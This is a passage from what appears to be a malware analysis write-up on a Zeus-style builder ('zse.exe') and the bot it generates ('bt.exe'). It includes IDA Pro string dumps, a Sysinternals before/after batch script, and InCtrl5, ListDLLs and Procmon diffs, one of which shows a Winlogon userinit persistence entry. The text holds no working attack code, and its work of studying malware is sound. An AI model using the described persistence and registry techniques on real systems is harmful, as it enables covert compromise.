.text:0041C8D0 0000001B C CreateDialogIndirectParamW

.text:0041C8EC 0000001B C CreateDialogIndirectParamA

.text:0041C908 0000000F C CreateDesktopW

.text:0041C918 0000000F C CreateDesktopA

.text:0041C928 0000000D C CreateCursor

.text:0041C938 0000000C C CreateCaret

.text:0041C944 00000018 C CreateAcceleratorTableW

.text:0041C95C 00000018 C CreateAcceleratorTableA

.text:0041C974 00000016 C CountClipboardFormats

.text:0041C98C 00000009 C CopyRect

.text:0041C998 0000000A C CopyImage

.text:0041C9A4 00000009 C CopyIcon

.text:0041C9B0 00000016 C CopyAcceleratorTableW

.text:0041C9C8 00000016 C CopyAcceleratorTableA

.text:0041C9E0 00000013 C CloseWindowStation

.text:0041C9F4 0000000C C CloseWindow

.text:0041CA00 0000000D C CloseDesktop

.text:0041CA10 0000000F C CloseClipboard

.text:0041CA20 0000000B C ClipCursor

.text:0041CA2C 0000000F C ClientToScreen

.text:0041CA3C 00000017 C ChildWindowFromPointEx

.text:0041CA54 00000015 C ChildWindowFromPoint

.text:0041CA6C 00000011 C CheckRadioButton

.text:0041CA80 00000013 C CheckMenuRadioItem

.text:0041CA94 0000000E C CheckMenuItem

.text:0041CAA4 0000000F C CheckDlgButton

.text:0041CAB4 0000000B C CharUpperW

.text:0041CAC0 0000000F C CharUpperBuffW

.text:0041CAD0 0000000F C CharUpperBuffA

.text:0041CAE0 0000000B C CharUpperA

.text:0041CAEC 0000000B C CharToOemW

.text:0041CAF8 0000000F C CharToOemBuffW

.text:0041CB08 0000000F C CharToOemBuffA

.text:0041CB18 0000000B C CharToOemA

.text:0041CB24 0000000A C CharPrevW

.text:0041CB30 0000000C C CharPrevExA

.text:0041CB3C 0000000A C CharPrevA

.text:0041CB48 0000000A C CharNextW

.text:0041CB54 0000000C C CharNextExA

.text:0041CB60 0000000A C CharNextA

.text:0041CB6C 0000000B C CharLowerW

.text:0041CB78 0000000F C CharLowerBuffW

.text:00421F90 00000013 C EndUpdateResourceW

.text:00421FA4 00000013 C EndUpdateResourceA

.text:00421FB8 00000010 C DuplicateHandle

.text:00421FC8 00000016 C DosDateTimeToFileTime

.text:00421FE0 00000014 C DisconnectNamedPipe

.text:00421FF4 0000001A C DisableThreadLibraryCalls

.text:00422010 00000010 C DeviceIoControl

.text:00422020 0000000C C DeleteFileW

.text:0042202C 0000000C C DeleteFileA

.text:00422038 0000000C C DeleteFiber

.text:00422044 0000000B C DeleteAtom

.text:00422050 00000011 C DefineDosDeviceW

.text:00422064 00000011 C DefineDosDeviceA

.text:00422078 0000000B C DebugBreak

.text:00422084 00000013 C DebugActiveProcess

.text:00422098 00000015 C CreateWaitableTimerW

.text:004220B0 00000015 C CreateWaitableTimerA

.text:004220C8 00000019 C CreateToolhelp32Snapshot

.text:004220E4 0000000D C CreateThread

.text:004220F4 00000014 C CreateTapePartition

.text:00422108 00000011 C CreateSemaphoreW

.text:0042211C 00000011 C CreateSemaphoreA

.text:00422130 00000013 C CreateRemoteThread

.text:00422144 0000000F C CreateProcessW

.text:00422154 0000000F C CreateProcessA

.text:00422164 0000000B C CreatePipe

.text:00422170 00000011 C CreateNamedPipeW

.text:00422184 00000011 C CreateNamedPipeA

.text:00422198 0000000D C CreateMutexW

.text:004221A8 0000000D C CreateMutexA

.text:004221B8 00000010 C CreateMailslotW

.text:004221C8 00000010 C CreateMailslotA

.text:004221D8 00000017 C CreateIoCompletionPort

.text:004221F0 0000000C C CreateFileW

.text:004221FC 00000013 C CreateFileMappingW

.text:00422210 00000013 C CreateFileMappingA

.text:00422224 0000000C C CreateFileA

.text:00422230 0000000C C CreateFiber

.text:0042223C 0000000D C CreateEventW

.text:0042224C 0000000D C CreateEventA

.text:0042225C 00000011 C CreateDirectoryW

.text:00422270 00000013 C CreateDirectoryExW

.text:00422284 00000013 C CreateDirectoryExA

.text:00422298 00000011 C CreateDirectoryA

.text:004222AC 0000001A C CreateConsoleScreenBuffer

.text:004222C8 0000000A C CopyFileW

.text:004222D4 0000000C C CopyFileExW

.text:004222E0 0000000C C CopyFileExA

.text:004222EC 0000000A C CopyFileA

.text:004222F8 00000015 C ConvertThreadToFiber

.text:00422310 00000015 C ConvertDefaultLocale

.text:00422328 00000013 C ContinueDebugEvent

.text:0042233C 00000011 C ConnectNamedPipe

.text:00422350 0000000F C CompareStringW

.text:00422360 0000000F C CompareStringA

.text:00422370 00000010 C CompareFileTime

.text:00422380 00000012 C CommConfigDialogW

.text:00422394 00000012 C CommConfigDialogA

.text:004223A8 0000000C C CloseHandle

.text:004223B4 0000000F C ClearCommError

.text:004223C4 0000000F C ClearCommBreak

.text:004223D4 00000014 C CancelWaitableTimer

.text:004223E8 00000009 C CancelIo

.text:004223F4 0000001A C CancelDeviceWakeupRequest

.text:00422410 0000000F C CallNamedPipeW

.text:00422420 0000000F C CallNamedPipeA

.text:00422430 0000000E C BuildCommDCBW

.text:00422440 00000019 C BuildCommDCBAndTimeoutsW

.text:0042245C 00000019 C BuildCommDCBAndTimeoutsA

.text:00422478 0000000E C BuildCommDCBA

.text:0041CB88 0000000F C CharLowerBuffA

.text:0041CB98 0000000B C CharLowerA

.text:0041CBA4 0000000C C ChangeMenuW

.text:0041CBB0 0000000C C ChangeMenuA

.text:0041CBBC 00000017 C ChangeDisplaySettingsW

.text:0041CBD4 00000019 C ChangeDisplaySettingsExW

.text:0041CBF0 00000019 C ChangeDisplaySettingsExA

.text:0041CC0C 00000017 C ChangeDisplaySettingsA

.text:0041CC24 00000015 C ChangeClipboardChain

.text:0041CC3C 0000000F C CascadeWindows

.text:0041CC4C 00000014 C CascadeChildWindows

.text:0041CC60 00000010 C CallWindowProcW

.text:0041CC70 00000010 C CallWindowProcA

.text:0041CC80 0000000F C CallNextHookEx

.text:0041CC90 0000000F C CallMsgFilterW

.text:0041CCA0 0000000F C CallMsgFilterA

.text:0041CCB0 0000000E C CallMsgFilter

.text:0041CCC0 00000018 C BroadcastSystemMessageW

.text:0041CCD8 00000018 C BroadcastSystemMessageA

.text:0041CCF0 00000017 C BroadcastSystemMessage

.text:0041CD08 00000011 C BringWindowToTop

.text:0041CD1C 0000000B C BlockInput

.text:0041CD28 0000000B C BeginPaint

.text:0041CD34 00000014 C BeginDeferWindowPos

.text:0041CD48 00000012 C AttachThreadInput

.text:0041CD5C 00000015 C ArrangeIconicWindows

.text:0041CD74 0000000C C AppendMenuW

.text:0041CD80 0000000C C AppendMenuA

.text:0041CD8C 00000009 C AnyPopup

.text:0041CD98 0000000E C AnimateWindow

.text:0041CDA8 00000013 C AdjustWindowRectEx

.text:0041CDBC 00000011 C AdjustWindowRect

.text:0041CDD0 00000016 C UnlockServiceDatabase

.text:0041CDE8 00000017 C TrusteeAccessToObjectW

.text:0041CE00 00000017 C TrusteeAccessToObjectA

.text:0041CE18 0000000E C StartServiceW

.text:0041CE28 0000001C C StartServiceCtrlDispatcherW

.text:0041CE44 0000001C C StartServiceCtrlDispatcherA

.text:0041CE60 0000000E C StartServiceA

.text:0041CE70 00000014 C SetTokenInformation

.text:0041CE84 0000000F C SetThreadToken

.text:0041CE94 00000011 C SetServiceStatus

.text:0041CEA8 00000019 C SetServiceObjectSecurity

.text:0041CEC4 0000000F C SetServiceBits

.text:0041CED4 00000013 C SetSecurityInfoExW

.text:0041CEE8 00000013 C SetSecurityInfoExA

.text:0041CEFC 00000010 C SetSecurityInfo

.text:0041CF0C 0000001A C SetSecurityDescriptorSacl

.text:0041CF28 0000001B C SetSecurityDescriptorOwner

.text:0041CF44 0000001B C SetSecurityDescriptorGroup

.text:0041CF60 0000001A C SetSecurityDescriptorDacl

.text:0041CF7C 00000019 C SetPrivateObjectSecurity

.text:0041CF98 00000016 C SetNamedSecurityInfoW

.text:0041CFB0 00000018 C SetNamedSecurityInfoExW

.text:0041CFC8 00000018 C SetNamedSecurityInfoExA

.text:0041CFE0 00000016 C SetNamedSecurityInfoA

.text:0041CFF8 00000018 C SetKernelObjectSecurity

.text:0041D010 00000011 C SetFileSecurityW

.text:0041D024 00000011 C SetFileSecurityA

.text:0041D038 00000017 C SetEntriesInAuditListW

.text:0041D050 00000017 C SetEntriesInAuditListA

.text:0041D068 00000011 C SetEntriesInAclW

.text:0041D07C 00000011 C SetEntriesInAclA

.text:0041D090 00000018 C SetEntriesInAccessListW

.text:0041D0A8 00000018 C SetEntriesInAccessListA

.text:0041D0C0 00000012 C SetAclInformation

.text:0041D0D4 0000000D C RevertToSelf

.text:0041D0E4 0000000D C ReportEventW

.text:0041D0F4 0000000D C ReportEventA

.text:0041D104 0000001C C RegisterServiceCtrlHandlerW

.text:00422488 00000015 C BeginUpdateResourceW

.text:004224A0 00000015 C BeginUpdateResourceA

.text:004224B8 00000005 C Beep

.text:004224C0 0000000C C BackupWrite

.text:004224CC 0000000B C BackupSeek

.text:004224D8 0000000B C BackupRead

.text:004224E4 00000010 C AreFileApisANSI

.text:004224F4 0000000D C AllocConsole

.text:00422504 00000009 C AddAtomW

.text:00422510 00000009 C AddAtomA

.text:00422520 00000006 C entry

.text:00422528 0000000D C imagehlp.dll

.text:00422538 00000013 C CheckSumMappedFile

.text:0042254C 00000005 C DanS

.text:00422554 00000005 C Rich

.text:0042255C 00000006 C .text

.text:00422564 00000007 C .rdata

.text:0042256C 00000006 C .data

.text:00428776 0000000A C WriteFile

.text:00428782 00000009 C ReadFile

.text:0042878C 0000000C C CreateFileW

.text:0042879A 0000000B C OpenMutexW

.text:004287A6 00000018 C SetNamedPipeHandleState

.text:004287C0 0000000C C HeapReAlloc

.text:0042885C 00000014 C MultiByteToWideChar

.text:00428872 0000000E C GetFileSizeEx

.text:00428882 00000013 C CreateFileMappingW

.text:00428896 00000013 C SetFileAttributesW

.text:004288AA 0000000D C CreateThread

.text:004288B8 0000000C C CloseHandle

.text:004288C6 00000006 C Sleep

.text:004288CE 00000011 C GetModuleHandleA

.text:004288E0 0000000D C LoadLibraryA

.text:004288EE 0000000F C GetProcAddress

.text:004288FE 00000013 C GetModuleFileNameW

.text:00428912 0000000C C ExitProcess

.text:00428920 0000000A C lstrcmpiA

.text:0042892C 00000009 C lstrcpyW

.text:00428936 00000014 C WideCharToMultiByte

.text:0042894C 0000000C C DeleteFileW

.text:0042895A 0000000E C CryptHashData

.text:0042896A 00000011 C CryptDestroyHash

.text:0042897C 00000010 C CryptCreateHash

.text:0042898E 00000012 C CryptGetHashParam

.text:004289A2 00000014 C CryptReleaseContext

.text:004289B8 00000015 C CryptAcquireContextW

.text:004289CE 00000011 C GetSaveFileNameW

.text:004289E0 00000011 C GetOpenFileNameW

.text:004289F2 0000000E C OleInitialize

.text:00428A2C 00000014 C PathRemoveFileSpecW

.text:00428A60 00000012 C PathFindFileNameA

.text:00428A74 0000000D C PathCombineW

.text:00428A82 00000015 C GetWindowTextLengthW

.text:00428A98 0000000C C MessageBoxW

.text:00428AFC 00000013 C CreateDialogParamW

.text:00428B10 0000000B C GetDlgItem

.text:00428B1C 0000000F C SetWindowLongW

.text:00428B2C 00000010 C GetDlgItemTextW

.data:00429028 00000005 C ¯¦\bÖ

From the Ŗbt.exeŗ and the Ŗzse.exeŗ IDA Pro details we can conclude that the client

malware generation is a lot of input driven functions that collect just about everything of

interest on the XP system. The generator of Ŗbt.exeŗ has few input driven files to support the

configuration file such as the encryption and file path functions. The Ŗzse.exeŗ has all the

functions and creates the collector Ŗbt.exeŗ inputs from its master library of functions. In the

generation of the Ŗbt.exe,ŗ the Ŗzse.exeŗ encrypted the configuration file details within the

Ŗbt.exeŗ comments. Those data variables cannot be distinguished. I highlighted the complete

section within the Ŗbt.exeŗ IDA Pro output file which covers this encrypted area of mention.

We can assume there are enough XP functions to take over the registry files and modify

anything on the system. It can do whatever the program wants to accomplish.

Other Quick Analysis

Process Explorer, Process Monitor, PsList, ListDLLs, TCPView and RootkitRevealer

(utilities from Sysinternals Suite)6 were used to see what other interesting comparisons could

be found from before and after the Ŗbt.exeŗ was executed on the host. InCtrl57 was also used

to see what it would find. A simple script Ŗkjk_before.batŗ file was made to execute these

tools in an orderly manner. The Ŗbeforeŗ and Ŗafterŗ files were analyzed with a tool called

WinMerge8 to do comparison of the before and after infection.

kjk_before.bat:

pslist > pslist_before.txt

listdlls > listdlls_before.txt

procmon

procexp

Tcpview

RootkitRevealer

The Sysinternals Suite was extracted and the Ŗkjk_before.batŗ was put into the same folder.

The Ŗkjk_before.batŗ was executed from within the same folder and the files output results

were saved into another folder called Ŗbeforeŗ after completing the batch process. Then the

program InCtrl5 was executed to launch the Ŗbt.exeŗ as part of the Ŗbeforeŗ and Ŗafterŗ

process. After InCtrl5 was completed the Ŗkjk_before.batŗ was executed to capture the same

information but now for the state of the host after it has been infected. The results of the file

outputs were put into a folder called Ŗafter.ŗ

6 http://technet.microsoft.com/en-us/sysinternals/bb842062

7 http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/

8 http://winmerge.org/

http://technet.microsoft.com/en-us/sysinternals/bb842062

http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/

http://winmerge.org/

The next few tables represent the results of what was discovered.

InCtrl5:

Installation Report: bt

Generated by InCtrl5, version 1.0.0.0

Install program: C:\Documents and Settings\Kevin\Desktop\bt.exe

4/24/2011 8:02 PM

------------------------------------------------------------

Registry

********

Keys ignored: 0

---------------

* (none)

Keys added: 2

-------------

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à

Keys deleted: 2

---------------

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t

Values added: 1

---------------

HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and

Settings\Kevin\Desktop\bt.exe"

Type: REG_SZ

Data: bt

Values changed: 19

------------------

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\NetworkService\Application Data

New data: C:\WINDOWS\system32\config\systemprofile\Application Data

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files

New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\LocalService\Cookies

New data: C:\WINDOWS\system32\config\systemprofile\Cookies

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\NetworkService\Local Settings\History

New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

"SavedLegacySettings"

Old type: REG_BINARY

New type: REG_BINARY

Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,

00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,

00, 00, 00, 00, 00, 00, 00, 00

New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,


00, 00, 00, 00, 00, 00, 00, 00

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\NetworkService\Application Data

New data: C:\WINDOWS\system32\config\systemprofile\Application Data

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files

New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\LocalService\Cookies

New data: C:\WINDOWS\system32\config\systemprofile\Cookies

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\NetworkService\Local Settings\History

New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

"SavedLegacySettings"



Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,


00, 00, 00, 00, 00, 00, 00, 00

New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,


00, 00, 00, 00, 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG "Seed"



Old data: CC, 90, 4A, 9F, 9B, DA, 48, D5, 27, 35, 0E, FD, 53, F6, 0D, FC, 6A, 3B, E4, 76, C7, E1, 6F, D6, 29,

85, D8, 01, 2F, A0, 8C, E0, 8B, 12, 95, 13, 68, 82, FC, C4, 41, DE, D9, 90, 41, AE, C3, B2, 52, 11, 99, FC, CB, 5B, 1D, E3, 1D,

E2, 17, A3, 1A, 34, 28, 42, ED, 02, 5A, 4C, 58, E1, 7C, DC, 30, 09, B1, 2C, 08, A2, 96, A2

New data: 7E, 4F, 14, E1, 46, 40, C9, 10, D8, 57, EE, 23, 5E, 8A, E2, B1, 7F, 24, 5A, 12, C4, F5, BE, 01, 37,

8C, 92, 94, 05, 7E, CF, AE, A9, 9F, BF, F4, F7, CA, DB, 6A, 91, 16, C2, 92, 54, 8E, 4D, DB, 83, 86, 93, A1, FE, 71, 93, 2F, E6,

75, D4, FE, C0, 38, FB, 3A, EE, 0B, 7B, 53, D2, BE, C9, E9, 26, 5A, 07, 1B, C8, AD, 73, 55

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch "Epoch"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 6E, 01, 00, 00

New data: 70, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-

A011-8BBF40B640BF} "DhcpRetryStatus"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 01, 00, 00, 00

New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-

9EFE-D137415271B6} "DhcpRetryStatus"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 01, 00, 00, 00

New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-

9EFE-D137415271B6} "DhcpRetryTime"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 25, 01, 00, 00

New data: 49, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch "Epoch"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 6E, 01, 00, 00

New data: 70, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-

4B3B-A011-8BBF40B640BF} "DhcpRetryStatus"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 01, 00, 00, 00

New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-

4BDE-9EFE-D137415271B6} "DhcpRetryStatus"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 01, 00, 00, 00

New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-

4BDE-9EFE-D137415271B6} "DhcpRetryTime"

Old type: REG_DWORD

New type: REG_DWORD

Old data: 25, 01, 00, 00

New data: 49, 01, 00, 00

------------------------------------------------------------

Disk contents

*************

Drives tracked: 1

-----------------

* c:\

Folders deleted: 1

------------------

c:\WINDOWS\system32\lowsec

Files deleted: 2

----------------

c:\WINDOWS\system32\lowsec\user.ds

Date: 4/24/2011 7:41 PM

Size: 2,423 bytes

c:\WINDOWS\system32\lowsec\user.ds.lll

Date: 3/23/2011 11:46 PM

Size: 1,377 bytes

Files changed: 21

-----------------

c:\Documents and Settings\Kevin\NTUSER.DAT.LOG

Old date: 4/24/2011 8:01 PM

New date: 4/24/2011 8:02 PM

Old size: 1,024 bytes

New size: 1,024 bytes

c:\Documents and Settings\Kevin\Cookies\index.dat

Old date: 4/24/2011 7:58 PM

New date: 4/24/2011 8:01 PM



c:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat

Old date: 4/24/2011 7:58 PM

New date: 4/24/2011 8:01 PM



c:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat

Old date: 4/24/2011 7:58 PM

New date: 4/24/2011 8:01 PM



c:\Documents and Settings\LocalService\ntuser.dat.LOG

Old date: 4/24/2011 7:44 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\LocalService\Local Settings\Temp\Cookies\index.dat

Old date: 4/24/2011 4:11 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\LocalService\Local Settings\Temp\History\History.IE5\index.dat

Old date: 4/24/2011 4:11 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\LocalService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat

Old date: 4/24/2011 4:11 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat

Old date: 4/24/2011 7:44 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\NetworkService\ntuser.dat.LOG

Old date: 4/24/2011 7:44 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\NetworkService\Local Settings\Temp\Cookies\index.dat

Old date: 4/24/2011 3:29 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\NetworkService\Local Settings\Temp\History\History.IE5\index.dat

Old date: 4/24/2011 3:29 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\NetworkService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat

Old date: 4/24/2011 3:29 PM

New date: 4/24/2011 8:02 PM



c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat

Old date: 4/24/2011 7:42 PM

New date: 4/24/2011 8:02 PM



c:\WINDOWS\Prefetch\BT.EXE-28F64617.pf

Old date: 4/24/2011 4:11 PM

New date: 4/24/2011 8:02 PM



c:\WINDOWS\system32\config\default.LOG

Old date: 4/24/2011 7:55 PM

New date: 4/24/2011 8:02 PM



c:\WINDOWS\system32\config\software.LOG

Old date: 4/24/2011 8:01 PM

New date: 4/24/2011 8:02 PM



c:\WINDOWS\system32\config\system.LOG

Old date: 4/24/2011 8:01 PM

New date: 4/24/2011 8:02 PM



c:\WINDOWS\system32\config\systemprofile\Cookies\index.dat

Old date: 4/24/2011 4:11 PM

New date: 4/24/2011 8:02 PM



c:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat

Old date: 4/24/2011 4:11 PM

New date: 4/24/2011 8:02 PM



c:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat

Old date: 4/24/2011 4:11 PM

New date: 4/24/2011 8:02 PM



------------------------------------------------------------

INI file

********

Ini files tracked: 4

--------------------

* C:\boot.ini

* c:\windows\control.ini

* c:\windows\system.ini

* c:\windows\win.ini

------------------------------------------------------------

Text file

*********

Text files tracked: 2

---------------------

* c:\windows\system32\autoexec.nt

* c:\windows\system32\config.nt

------------------------------------------------------------

InCtrl5, Copyright © 2000 by Ziff Davis Media, Inc.

Written by Neil J. Rubenking

First published in PC Magazine, December 5, 2000.

Winmerge List dlls Only showing the difference from listdlls_after.txt

0x3d930000 0xd1000 7.00.6000.17095 wininet.dll

0x00aa0000 0x9000 6.00.5441.0000 Normaliz.dll

0x3dfd0000 0x45000 7.00.6000.17095 iertutil.dll

0x71ad0000 0x9000 5.01.2600.5512 wsock32.dll

0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll

0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll

0x5d090000 0x9a000 5.82.2900.6028 comctl32.dll

0x774e0000 0x13e000 5.01.2600.6010 ole32.dll

0x77a80000 0x95000 5.131.2600.5512 crypt32.dll

0x77b20000 0x12000 5.01.2600.5875 MSASN1.dll

0x68000000 0x36000 5.01.2600.5507 rsaenh.dll

0x76bf0000 0xb000 5.01.2600.5512 psapi.dll

0x662b0000 0x58000 5.01.2600.5512 hnetcfg.dll

0x76ee0000 0x3c000 5.01.2600.5512 RASAPI32.dll

0x76e90000 0x12000 5.01.2600.5512 rasman.dll

0x76eb0000 0x2f000 5.01.2600.5512 TAPI32.dll

0x76e80000 0xe000 5.01.2600.5512 rtutils.dll

0x77c70000 0x25000 5.01.2600.5876 msv1_0.dll

0x76790000 0xc000 5.01.2600.5512 cryptdll.dll

0x76d60000 0x19000 5.01.2600.5512 iphlpapi.dll

0x722b0000 0x5000 5.01.2600.5512 sensapi.dll

0x71a50000 0x3f000 5.01.2600.5625 mswsock.dll

0x76fc0000 0x6000 5.01.2600.5512 rasadhlp.dll

0x78130000 0x128000 7.00.6000.17095 urlmon.dll

0x76f20000 0x27000 5.01.2600.5625 DNSAPI.dll

0x71a90000 0x8000 5.01.2600.5512 wshtcpip.dll

0x5e0c0000 0xd000 5.01.2600.5512 pstorec.dll

0x76b20000 0x11000 3.05.2284.0002 ATL.DLL

0x5b860000 0x55000 5.01.2600.5694 netapi32.dll

0x75970000 0xf8000 5.01.2600.5512 MSGINA.dll

0x74320000 0x3d000 3.525.3012.0000 ODBC32.dll

0x763b0000 0x49000 6.00.2900.5512 comdlg32.dll

0x02c50000 0x17000 3.525.1132.0000 odbcint.dll

0x71ab0000 0x17000 5.01.2600.5512 ws2_32.dll

0x71aa0000 0x8000 5.01.2600.5512 WS2HELP.dll

0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll

0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll

0x773d0000 0x103000 5.82.2900.6028 comctl32.dll

0x77c00000 0x8000 5.01.2600.5512 VERSION.dll

0x769c0000 0xb4000 5.01.2600.5512 userenv.dll

0x68000000 0x36000 5.01.2600.5507 rsaenh.dll

Winmerge Procmon

Sample output of some of the interesting items discovered. This output is very long.

8:04:53.2816426 PM","winlogon.exe","916","RegCreateKey","HKLM\software\microsoft\windows

nt\currentversion\winlogon","SUCCESS","Desired Access: Query Value, Set Value

8:04:53.2817289 PM","winlogon.exe","916","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Winlogon\userinit","SUCCESS","Type: REG_SZ, Length: 130, Data:

C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,

8:04:53.2817808 PM","winlogon.exe","916","RegCloseKey","HKLM\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Winlogon","SUCCESS","" "7:47:44.6292542

PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy\SecDesc","SUCCESS","Desired Access:

Read" "8:04:53.3393918 PM","lsass.exe","972","RegOpenKey","HKLM\SECURITY\Policy","SUCCESS","Desired Access:

Read/Write"

8:04:53.3394714 PM","lsass.exe","972","RegQueryValue","HKLM\SECURITY\Policy\SecDesc\(Default)","BUFFER

OVERFLOW","Length: 12"

8:04:53.4492538 PM","lsass.exe","972","RegCloseKey","HKLM\SECURITY\Policy","SUCCESS",""

8:04:54.5563677 PM","Explorer.EXE","424","QueryDirectory","C:\Documents and Settings\Kevin\Desktop\ss","SUCCESS","0:

handle.exe, 1: hex2dec.exe, 2: junction.exe, 3: kjk_before.bat, 4: ldmdump.exe, 5: Listdlls.exe, 6: listdlls_before.txt, 7: livekd.exe,

8: LoadOrd.exe, 9: logonsessions.exe, 10: movefile.exe, 11: ntfsinfo.exe, 12: pagedfrg.exe, 13: pagedfrg.hlp, 14: pdh.dll, 15:

pendmoves.exe, 16: pipelist.exe, 17: PORTMON.CNT, 18: portmon.exe, 19: PORTMON.HLP, 20: procdump.exe, 21:

procexp.chm, 22: procexp.exe, 23: ProcFeatures.exe, 24: procmon.chm, 25: Procmon.exe, 26: PsExec.exe, 27: psfile.exe, 28:

PsGetsid.exe, 29: PsInfo.exe, 30: pskill.exe, 31: PsList.exe, 32: pslist_before.txt

verclsid.exe:

CreateFile C: SUCCESS Desired Access: Read Attributes, Write Attributes, Synchronize, Disposition: Open,

Options: Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, OpenResult: Opened

QueryInformationVolume C: SUCCESS VolumeCreationTime: 3/22/2011 4:48:20 PM, VolumeSerialNumber: 907B-

